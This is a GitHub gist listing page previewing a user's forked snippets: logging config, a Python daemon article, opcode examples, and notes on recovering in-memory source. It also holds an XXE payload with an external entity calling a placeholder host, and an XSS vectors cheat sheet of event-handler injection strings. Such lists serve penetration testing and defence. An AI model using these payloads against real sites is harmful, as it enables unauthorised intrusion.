Skip to content

Instantly share code, notes, and snippets.

View hxer's full-sized avatar

bees hxer

58 followers · 41 following
View GitHub Profile
@hxer
hxer / logging.yaml
Last active July 26, 2018 06:09 — forked from JesseBuesking/logging.yaml
python2 MultiProcess Log
---
version: 1
disable_existing_loggers: False
formatters:
simple:
format: "%(name)-20s%(levelname)-8s%(message)s"
handlers:
console:
class: logging.StreamHandler
level: DEBUG
@hxer
hxer / XXE_payloads
Created August 11, 2017 13:05 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@hxer
hxer / daemon.md
Last active June 18, 2017 07:32 — forked from andreif/daemon.md
A simple unix/linux daemon in Python

A simple unix/linux daemon in Python

Source: http://www.jejik.com/articles/2007/02/a_simple_unix_linux_daemon_in_python/

Access: http://web.archive.org/web/20131025230048/http://www.jejik.com/articles/2007/02/a_simple_unix_linux_daemon_in_python/

by Sander Marechal

I've written a simple Python class for creating daemons on unix/linux systems. It was pieced together for various other examples, mostly corrections to various Python Cookbook articles and a couple of examples posted to the Python mailing lists. It has support for a pidfile to keep track of the process. I hope it's useful to someone.

@hxer
hxer / xss_vectors.txt
Created June 7, 2017 01:41 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@hxer
hxer / pyopcode.py
Created March 18, 2017 06:25 — forked from fate0/pymarshal.py
using all python opcode
# from __future__ import division
# def_op('STOP_CODE', 0)
# ignore
# def_op('POP_TOP', 1)
a()
# def_op('ROT_TWO', 2)
(a, b) = (b, a)
@hxer
hxer / recover_source_code.md
Created March 18, 2017 00:58 — forked from simonw/recover_source_code.md
How to recover lost Python source code if it's still resident in-memory

How to recover lost Python source code if it's still resident in-memory

I screwed up using git ("git checkout --" on the wrong file) and managed to delete the code I had just written... but it was still running in a process in a docker container. Here's how I got it back, using https://pypi.python.org/pypi/pyrasite/ and https://pypi.python.org/pypi/uncompyle6

Attach a shell to the docker container

Install GDB (needed by pyrasite)

apt-get update && apt-get install gdb